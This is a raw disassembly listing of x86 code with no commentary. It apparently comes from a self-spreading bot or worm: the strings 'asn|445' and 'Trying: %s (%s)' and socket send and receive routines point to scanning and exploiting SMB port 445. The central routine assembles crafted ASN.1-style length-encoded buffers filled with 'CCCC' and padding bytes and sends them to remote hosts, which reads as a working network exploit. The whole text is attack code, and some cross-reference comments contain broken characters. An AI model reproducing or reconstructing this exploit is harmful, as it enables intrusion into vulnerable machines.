loc_40B75A: ; CODE XREF: sub_40B31C+291�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B31C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0A54h
push ebx
push esi
push edi
push 0BB80h
push 76Ch
call sub_408964
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call sub_40D7B0
add esp, 14h
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-14h], 2
call dword_4C4704
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call dword_4C47DC
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_4C4690
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40B867
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_4C463C
cmp eax, 0FFFFFFFFh
jz loc_40B867
push edi
push 89h
push offset dword_41F290
push ebx
call dword_4C4724
cmp eax, 0FFFFFFFFh
jz short loc_40B867
push edi
mov esi, 640h
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_4C45F4
push edi
push 0A8h
push offset dword_41F320
push ebx
call dword_4C4724
cmp eax, 0FFFFFFFFh
jz short loc_40B867
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_4C45F4
push edi
push 0DEh
push offset dword_41F3D0
push ebx
call dword_4C4724
cmp eax, 0FFFFFFFFh
jz short loc_40B867
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_4C45F4
movsx eax, byte ptr [ebp-610h]
sub eax, 30h
jz short loc_40B871
dec eax
jz short loc_40B86E
loc_40B867: ; CODE XREF: .text:0040B7C2�j
; .text:0040B7D8�j ...
xor eax, eax
jmp loc_40B915
; ---------------------------------------------------------------------------
loc_40B86E: ; CODE XREF: .text:0040B865�j
push edi
jmp short loc_40B895
; ---------------------------------------------------------------------------
loc_40B871: ; CODE XREF: .text:0040B862�j
push 2
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40B31C
add esp, 0C4h
test al, al
jnz short loc_40B8B5
push 1
loc_40B895: ; CODE XREF: .text:0040B86F�j
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40B31C
add esp, 0C4h
test al, al
jz short loc_40B8BC
loc_40B8B5: ; CODE XREF: .text:0040B891�j
mov dword ptr [ebp-4], 1
loc_40B8BC: ; CODE XREF: .text:0040B8B3�j
push ebx
call dword_4C479C
cmp dword ptr [ebp-4], 0
jz short loc_40B912
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aAsn445 ; "asn|445"
push eax
lea eax, [ebp+0Ch]
push eax
push offset aTryingSS ; "Trying: %s (%s)"
lea eax, [ebp-0A54h]
push 400h
push eax
call sub_40DFEC
lea eax, [ebp-0A54h]
push eax
call sub_401648
mov eax, [ebp+0B0h]
imul eax, 3Ch
lea eax, dword_41EE80[eax]
add esp, 18h
inc dword ptr [eax]
loc_40B912: ; CODE XREF: .text:0040B8C7�j
xor eax, eax
inc eax
loc_40B915: ; CODE XREF: .text:0040B869�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40B91A proc near ; CODE XREF: sub_40C3E8+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movsx eax, [esp+arg_8]
push [esp+arg_4]
push eax
push [esp+8+arg_0]
call sub_40D7B0
add esp, 0Ch
retn
sub_40B91A endp
; =============== S U B R O U T I N E =======================================
sub_40B931 proc near ; CODE XREF: sub_40BB9B+E�p
; sub_40BB9B+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40B931 endp
; =============== S U B R O U T I N E =======================================
sub_40B93B proc near ; CODE XREF: sub_40BB9B+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_40E74F
mov edi, eax
test edi, edi
pop ecx
jz short loc_40B96D
push ebx
push 0
push edi
call sub_40D7B0
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_40E3A0
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40B96D: ; CODE XREF: sub_40B93B+14�j
pop edi
mov eax, esi
pop esi
pop ebx
retn 8
sub_40B93B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B975 proc near ; CODE XREF: sub_40BA6B+19�p
; sub_40BADF+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
mov ebx, ecx
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_40E74F
mov esi, eax
test esi, esi
pop ecx
jz short loc_40B9C1
push edi
push 0
push esi
call sub_40D7B0
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_40E3A0
push [ebp+arg_C]
mov eax, [ebp+arg_4]
push [ebp+arg_8]
add eax, esi
push eax
call sub_40E3A0
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40B9C1: ; CODE XREF: sub_40B975+1C�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 10h
sub_40B975 endp
; =============== S U B R O U T I N E =======================================
sub_40B9CA proc near ; CODE XREF: sub_40BA6B+5B�p
; sub_40BA6B+68�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40B9DA
push eax
call sub_40E359
pop ecx
loc_40B9DA: ; CODE XREF: sub_40B9CA+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40B9CA endp
; =============== S U B R O U T I N E =======================================
sub_40B9E3 proc near ; CODE XREF: sub_40BA6B+21�p
; sub_40BB40+8�p ...
push esi
mov esi, ecx
mov eax, [esi+4]
cmp eax, 0FFFFh
jl short loc_40B9F4
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B9F4: ; CODE XREF: sub_40B9E3+B�j
push ebx
xor ebx, ebx
cmp eax, 7Fh
setnl bl
push edi
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax
call sub_40E74F
mov edi, eax
test edi, edi
pop ecx
jnz short loc_40BA15
xor al, al
jmp short loc_40BA67
; ---------------------------------------------------------------------------
loc_40BA15: ; CODE XREF: sub_40B9E3+2C�j
mov eax, [esi+4]
add eax, ebx
push eax
push 0
push edi
call sub_40D7B0
add esp, 0Ch
cmp ebx, 1
jnz short loc_40BA35
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_40BA4A
; ---------------------------------------------------------------------------
loc_40BA35: ; CODE XREF: sub_40B9E3+46�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_40BA4A: ; CODE XREF: sub_40B9E3+50�j
push dword ptr [esi+4]
push dword ptr [esi]
push eax
call sub_40E3A0
add esp, 0Ch
push dword ptr [esi]
call sub_40E359
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40BA67: ; CODE XREF: sub_40B9E3+30�j
pop edi
pop ebx
pop esi
retn
sub_40B9E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA6B proc near ; CODE XREF: sub_40BB9B+89�p
; sub_40BB9B+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, ecx
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_419388
call sub_40B975
lea ecx, [ebp+var_8]
call sub_40B9E3
mov ebx, [ebp+var_4]
inc ebx
push ebx
call sub_40E74F
mov edi, eax
test edi, edi
pop ecx
jnz short loc_40BAA6
xor al, al
jmp short loc_40BADA
; ---------------------------------------------------------------------------
loc_40BAA6: ; CODE XREF: sub_40BA6B+35�j
push ebx
push 0
push edi
call sub_40D7B0
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
mov byte ptr [edi], 3
push eax
call sub_40E3A0
add esp, 18h
mov ecx, esi
call sub_40B9CA
lea ecx, [ebp+var_8]
mov [esi+4], ebx
mov [esi], edi
call sub_40B9CA
mov al, 1
loc_40BADA: ; CODE XREF: sub_40BA6B+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BA6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BADF proc near ; CODE XREF: sub_40BB13+14�p
; sub_40BB30+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push [ebp+arg_4]
mov esi, ecx
push [ebp+arg_0]
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_40B975
mov ecx, esi
call sub_40B9CA
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40BADF endp
; =============== S U B R O U T I N E =======================================
sub_40BB13 proc near ; CODE XREF: sub_40BB9B+F0�p
; sub_40BB9B+15B�p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_40D630
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40BADF
pop esi
retn 4
sub_40BB13 endp
; =============== S U B R O U T I N E =======================================
sub_40BB30 proc near ; CODE XREF: sub_40BB7C+B�p
; sub_40BB9B+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40BADF
retn 8
sub_40BB30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB40 proc near ; CODE XREF: sub_40BB7C+16�p
; sub_40BB9B+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40B9E3
test al, al
jz short loc_40BB79
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_419C64
call sub_40B975
mov ecx, esi
call sub_40B9CA
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40BB79: ; CODE XREF: sub_40BB40+F�j
pop esi
leave
retn
sub_40BB40 endp
; =============== S U B R O U T I N E =======================================
sub_40BB7C proc near ; CODE XREF: sub_40BB9B+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
mov esi, ecx
push [esp+8+arg_0]
call sub_40BB30
test al, al
jz short loc_40BB97
mov ecx, esi
call sub_40BB40
loc_40BB97: ; CODE XREF: sub_40BB7C+12�j
pop esi
retn 8
sub_40BB7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB9B proc near ; CODE XREF: sub_40C878+88�p
var_848 = byte ptr -848h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 848h
push ebx
push edi
lea ecx, [ebp+var_38]
call sub_40B931
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_40BEDF
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_40BEDF
push esi
lea ecx, [ebp+var_28]
call sub_40B931
lea ecx, [ebp+var_8]
call sub_40B931
lea ecx, [ebp+var_40]
call sub_40B931
lea ecx, [ebp+var_10]
call sub_40B931
lea ecx, [ebp+var_30]
call sub_40B931
lea ecx, [ebp+var_20]
call sub_40B931
lea ecx, [ebp+var_18]
call sub_40B931
push 4
push offset dword_41F9C0
lea ecx, [ebp+var_28]
call sub_40BADF
push 3
push offset dword_41F9BC
lea ecx, [ebp+var_28]
call sub_40BADF
lea ecx, [ebp+var_28]
call sub_40BA6B
lea ecx, [ebp+var_28]
call sub_40BB40
mov esi, 800h
push esi
lea eax, [ebp+var_848]
push 42h
push eax
call sub_40D7B0
add esp, 0Ch
push 8
push offset byte_41F9B0
lea ecx, [ebp+var_8]
call sub_40BADF
push ebx
push [ebp+arg_C]
lea ecx, [ebp+var_8]
call sub_40BADF
mov eax, 409h
sub eax, [ebp+var_4]
lea ecx, [ebp+var_8]
push eax
lea eax, [ebp+var_848]
push eax
call sub_40BADF
lea ecx, [ebp+var_8]
call sub_40BA6B
push offset loc_41B898
lea ecx, [ebp+var_40]
call sub_40BB13
lea ecx, [ebp+var_40]
call sub_40BA6B
push esi
lea eax, [ebp+var_848]
push 44h
push eax
call sub_40D7B0
add esp, 0Ch
push 410h
lea eax, [ebp+var_848]
push eax
lea ecx, [ebp+var_48]
call sub_40B93B
lea ecx, [ebp+var_48]
call sub_40BA6B
push [ebp+var_44]
lea ecx, [ebp+var_40]
push [ebp+var_48]
call sub_40BB7C
lea ecx, [ebp+var_48]
call sub_40B9CA
push esi
lea eax, [ebp+var_848]
push 43h
push eax
call sub_40D7B0
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_10]
call sub_40BB13
push 4
push offset dword_41F9A8
lea ecx, [ebp+var_10]
call sub_40BADF
push [ebp+arg_8]
lea ecx, [ebp+var_10]
push [ebp+arg_4]
call sub_40BADF
sub edi, [ebp+arg_8]
lea eax, [ebp+var_848]
push edi
push eax
lea ecx, [ebp+var_10]
call sub_40BADF
lea ecx, [ebp+var_10]
call sub_40BA6B
push [ebp+var_C]
lea ecx, [ebp+var_30]
push [ebp+var_10]
call sub_40BB30
push [ebp+var_3C]
lea ecx, [ebp+var_30]
push [ebp+var_40]
call sub_40BB30
lea ecx, [ebp+var_30]
call sub_40BB40
lea ecx, [ebp+var_10]
call sub_40B9CA
lea ecx, [ebp+var_40]
call sub_40B9CA
push [ebp+var_4]
lea ecx, [ebp+var_20]
push [ebp+var_8]
call sub_40BB30
push [ebp+var_24]
lea ecx, [ebp+var_20]
push [ebp+var_28]
call sub_40BB30
push [ebp+var_2C]
lea ecx, [ebp+var_20]
push [ebp+var_30]
call sub_40BB30
lea ecx, [ebp+var_20]
call sub_40BB40
lea ecx, [ebp+var_8]
call sub_40B9CA
lea ecx, [ebp+var_28]
call sub_40B9CA
lea ecx, [ebp+var_30]
call sub_40B9CA
push esi
lea eax, [ebp+var_848]
push 41h
push eax
call sub_40D7B0
add esp, 0Ch
push 400h
lea eax, [ebp+var_848]
push eax
lea ecx, [ebp+var_18]
call sub_40BADF
lea ecx, [ebp+var_18]
call sub_40BA6B
push 2
push offset dword_41B88C
lea ecx, [ebp+var_18]
call sub_40BADF
push [ebp+var_1C]
lea ecx, [ebp+var_18]
push [ebp+var_20]
call sub_40BB30
lea ecx, [ebp+var_18]
call sub_40BB40
lea ecx, [ebp+var_20]
call sub_40B9CA
lea ecx, [ebp+var_10]
call sub_40B931
lea ecx, [ebp+var_8]
call sub_40B931
push [ebp+var_14]
lea ecx, [ebp+var_10]
push [ebp+var_18]
call sub_40BB30
lea ecx, [ebp+var_10]
call sub_40B9E3
lea ecx, [ebp+var_18]
call sub_40B9CA
push offset dword_41B888
lea ecx, [ebp+var_8]
call sub_40BB13
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40BB30
lea ecx, [ebp+var_8]
call sub_40B9E3
lea ecx, [ebp+var_10]
call sub_40B9CA
push offset a0 ; "0"
lea ecx, [ebp+var_10]
call sub_40BB13
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40BB30
lea ecx, [ebp+var_10]
call sub_40B9E3
lea ecx, [ebp+var_8]
call sub_40B9CA
push offset dword_41B87C
lea ecx, [ebp+var_8]
call sub_40BB13
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40BB30
lea ecx, [ebp+var_8]
call sub_40B9E3
lea ecx, [ebp+var_10]
call sub_40B9CA
push offset asc_41B878 ; "`"
lea ecx, [ebp+var_38]
call sub_40BB13
push [ebp+var_4]
lea ecx, [ebp+var_38]
push [ebp+var_8]
call sub_40BB30
lea ecx, [ebp+var_8]
call sub_40B9CA
pop esi
loc_40BEDF: ; CODE XREF: sub_40BB9B+1B�j
; sub_40BB9B+29�j
mov ecx, [ebp+var_38]
mov eax, [ebp+arg_0]
mov [eax], ecx
mov ecx, [ebp+var_34]
pop edi
mov [eax+4], ecx
pop ebx
leave
retn
sub_40BB9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BEF1 proc near ; CODE XREF: sub_40BFB5+A1�p
; sub_40BFB5+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
push eax
push 0
lea eax, [ebp+var_10C]
push eax
xor edi, edi
lea eax, [esi+1]
inc edi
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call dword_419214 ; select
cmp eax, edi
jnz short loc_40BF58
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40D60A ; __WSAFDIsSet
test eax, eax
jnz short loc_40BF5C
loc_40BF58: ; CODE XREF: sub_40BEF1+54�j
xor eax, eax
jmp short loc_40BF6C
; ---------------------------------------------------------------------------
loc_40BF5C: ; CODE XREF: sub_40BEF1+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4C45F4
loc_40BF6C: ; CODE XREF: sub_40BEF1+69�j
pop edi
pop esi
leave
retn
sub_40BEF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF70 proc near ; CODE XREF: sub_40BFB5+81�p
; sub_40BFB5+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_4C47B8
push 0
mov [ebp+var_4], eax
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_4C4724
cmp eax, 4
jz short loc_40BF9A
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40BF9A: ; CODE XREF: sub_40BF70+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4C4724
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40BF70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFB5 proc near ; CODE XREF: sub_40C08F+48�p
; sub_40C878+157�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_40E74F
mov esi, eax
test esi, esi
pop ecx
jnz short loc_40BFDE
xor al, al
jmp loc_40C08A
; ---------------------------------------------------------------------------
loc_40BFDE: ; CODE XREF: sub_40BFB5+20�j
push ebx
push 0
push esi
call sub_40D7B0
push 2Fh
push offset dword_41FA5C
push esi
call sub_40E3A0
push 8
lea eax, [esi+31h]
push offset dword_41FA50
push eax
mov [esi+2Fh], di
call sub_40E3A0
push edi
push [ebp+arg_4]
lea ebx, [esi+3Bh]
push ebx
mov [esi+39h], di
call sub_40E3A0
push 6
push offset dword_4C58BC
add ebx, edi
push ebx
call sub_40E3A0
mov ebx, [ebp+arg_0]
push 85h
push offset dword_41F9C8
push ebx
call sub_40BF70
add esp, 48h
test al, al
jnz short loc_40C046
loc_40C042: ; CODE XREF: sub_40BFB5+B5�j
xor bl, bl
jmp short loc_40C081
; ---------------------------------------------------------------------------
loc_40C046: ; CODE XREF: sub_40BFB5+8B�j
push 0
mov edi, 100h
push edi
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40BEF1
push [ebp+var_4]
push esi
push ebx
call sub_40BF70
add esp, 1Ch
test al, al
jz short loc_40C042
push 0
push edi
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40BEF1
add esp, 10h
mov bl, 1
loc_40C081: ; CODE XREF: sub_40BFB5+8F�j
push esi
call sub_40E359
pop ecx
mov al, bl
loc_40C08A: ; CODE XREF: sub_40BFB5+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BFB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C08F proc near ; CODE XREF: sub_40C878+13D�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_41FA90
push [ebp+arg_0]
call dword_419258 ; send
cmp eax, 48h
jnz short loc_40C0CA
push 0
push 20h
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_40BEF1
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40C0CA
cmp [ebp+var_20], 82h
jz short loc_40C0CE
loc_40C0CA: ; CODE XREF: sub_40C08F+1B�j
; sub_40C08F+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40C0CE: ; CODE XREF: sub_40C08F+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BFB5
add esp, 0Ch
leave
retn
sub_40C08F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C0E1 proc near ; CODE XREF: sub_40C62F+29�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
shl eax, 3
test eax, eax
mov [ebp+arg_0], eax
fild [ebp+arg_0]
jge short loc_40C0FC
fadd dbl_419F58
loc_40C0FC: ; CODE XREF: sub_40C0E1+13�j
fmul dbl_41B8B0
call sub_40E2E4
test eax, eax
mov [ebp+arg_0], eax
fild [ebp+arg_0]
jge short loc_40C117
fadd dbl_419F58
loc_40C117: ; CODE XREF: sub_40C0E1+2E�j
fst [ebp+var_8]
push ecx
fmul dbl_41B8A8
push ecx
fstp [esp+10h+var_10]
call sub_40F5A0
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_40E2E4
inc eax
leave
retn
sub_40C0E1 endp
; =============== S U B R O U T I N E =======================================
sub_40C139 proc near ; CODE XREF: sub_40C448+B�p
; sub_40C567+B�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+18h]
cmp esi, 10h
lea eax, [ecx+4]
jb short loc_40C149
mov edx, [eax]
jmp short loc_40C14B
; ---------------------------------------------------------------------------
loc_40C149: ; CODE XREF: sub_40C139+A�j
mov edx, eax
loc_40C14B: ; CODE XREF: sub_40C139+E�j
cmp edx, [esp+4+arg_0]
ja short loc_40C168
cmp esi, 10h
jb short loc_40C158
mov eax, [eax]
loc_40C158: ; CODE XREF: sub_40C139+1B�j
mov ecx, [ecx+14h]
add ecx, eax
cmp [esp+4+arg_0], ecx
jnb short loc_40C168
xor eax, eax
inc eax
jmp short loc_40C16A
; ---------------------------------------------------------------------------
loc_40C168: ; CODE XREF: sub_40C139+16�j
; sub_40C139+28�j
xor eax, eax
loc_40C16A: ; CODE XREF: sub_40C139+2D�j
pop esi
retn 4
sub_40C139 endp
; =============== S U B R O U T I N E =======================================
sub_40C16E proc near ; CODE XREF: sub_40C18A+24�p
; sub_40C1BF+94�p ...
arg_0 = dword ptr 4
cmp dword ptr [ecx+18h], 10h
mov eax, [esp+arg_0]
mov [ecx+14h], eax
jb short loc_40C180
mov ecx, [ecx+4]
jmp short loc_40C183
; ---------------------------------------------------------------------------
loc_40C180: ; CODE XREF: sub_40C16E+B�j
add ecx, 4
loc_40C183: ; CODE XREF: sub_40C16E+10�j
and byte ptr [ecx+eax], 0
retn 4
sub_40C16E endp
; =============== S U B R O U T I N E =======================================
sub_40C18A proc near ; CODE XREF: .text:0040C1B9�p
; sub_40C1BF+84�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_40C1A3
cmp dword ptr [esi+18h], 10h
jb short loc_40C1A3
push dword ptr [esi+4]
call sub_40F6C1
pop ecx
loc_40C1A3: ; CODE XREF: sub_40C18A+8�j
; sub_40C18A+E�j
push 0
mov ecx, esi
mov dword ptr [esi+18h], 0Fh
call sub_40C16E
pop esi
retn 4
sub_40C18A endp
; ---------------------------------------------------------------------------
loc_40C1B7: ; CODE XREF: .text:00417FF4�j
; .text:00418006�j ...
push 1
call sub_40C18A
retn
; =============== S U B R O U T I N E =======================================
sub_40C1BF proc near ; CODE XREF: sub_40C27D+26�p
mov eax, offset loc_417FE7
call sub_40F234
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 0Fh
cmp edi, 0FFFFFFFEh
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_40C1E5
mov edi, [ebp+8]
loc_40C1E5: ; CODE XREF: sub_40C1BF+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+1]
push eax
call sub_40F6C6
pop ecx
mov ebx, eax
jmp short loc_40C21E
; ---------------------------------------------------------------------------
loc_40C1F7: ; DATA XREF: .text:0041CAF0�o
mov eax, [ebp+8]
mov [ebp+8], eax
inc eax
mov [ebp-10h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_40F6C6
mov [ebp-18h], eax
pop ecx
mov eax, offset loc_40C215
retn
; ---------------------------------------------------------------------------
loc_40C215: ; DATA XREF: sub_40C1BF+50�o
mov esi, [ebp-14h]
mov edi, [ebp+8]
mov ebx, [ebp-18h]
loc_40C21E: ; CODE XREF: sub_40C1BF+36�j
cmp dword ptr [ebp+0Ch], 0
jbe short loc_40C23F
cmp dword ptr [esi+18h], 10h
jb short loc_40C22F
mov eax, [esi+4]
jmp short loc_40C232
; ---------------------------------------------------------------------------
loc_40C22F: ; CODE XREF: sub_40C1BF+69�j
lea eax, [esi+4]
loc_40C232: ; CODE XREF: sub_40C1BF+6E�j
push dword ptr [ebp+0Ch]
push eax
push ebx
call sub_40E3A0
add esp, 0Ch
loc_40C23F: ; CODE XREF: sub_40C1BF+63�j
push 1
mov ecx, esi
call sub_40C18A
push dword ptr [ebp+0Ch]
mov ecx, esi
mov [esi+4], ebx
mov [esi+18h], edi
call sub_40C16E
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 8
sub_40C1BF endp
; =============== S U B R O U T I N E =======================================
sub_40C269 proc near ; DATA XREF: .text:0041CAE0�o
mov ecx, [ebp-14h]
push 1
call sub_40C18A
push 0
push 0
call sub_40F6D4
int 3 ; Trap to Debugger
sub_40C269 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C27D proc near ; CODE XREF: sub_40C2D9+48�p
; sub_40C36E+61�p ...
arg_0 = dword ptr 4
arg_8 = byte ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
cmp edi, 0FFFFFFFEh
mov esi, ecx
jbe short loc_40C28F
call sub_417E2C
loc_40C28F: ; CODE XREF: sub_40C27D+B�j
xor eax, eax
cmp [esi+18h], edi
jnb short loc_40C2AA
cmp [esp+4+arg_8], al
jnz short loc_40C29F
mov eax, [esi+14h]
loc_40C29F: ; CODE XREF: sub_40C27D+1D�j
push eax
push edi
mov ecx, esi
call sub_40C1BF
jmp short loc_40C2CC
; ---------------------------------------------------------------------------
loc_40C2AA: ; CODE XREF: sub_40C27D+17�j
cmp [esp+4+arg_8], al
jz short loc_40C2C0
cmp edi, 10h
jnb short loc_40C2C0
push 1
mov ecx, esi
call sub_40C18A
jmp short loc_40C2CC
; ---------------------------------------------------------------------------
loc_40C2C0: ; CODE XREF: sub_40C27D+31�j
; sub_40C27D+36�j
cmp edi, eax
jnz short loc_40C2CC
push eax
mov ecx, esi
call sub_40C16E
loc_40C2CC: ; CODE XREF: sub_40C27D+2B�j
; sub_40C27D+41�j ...
xor eax, eax
cmp eax, edi
sbb eax, eax
pop edi
neg eax
pop esi
retn 8
sub_40C27D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2D9 proc near ; CODE XREF: sub_40C448+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, [ebp+arg_4]
cmp [ebx+14h], edi
mov esi, ecx
jnb short loc_40C2F1
call sub_417D91
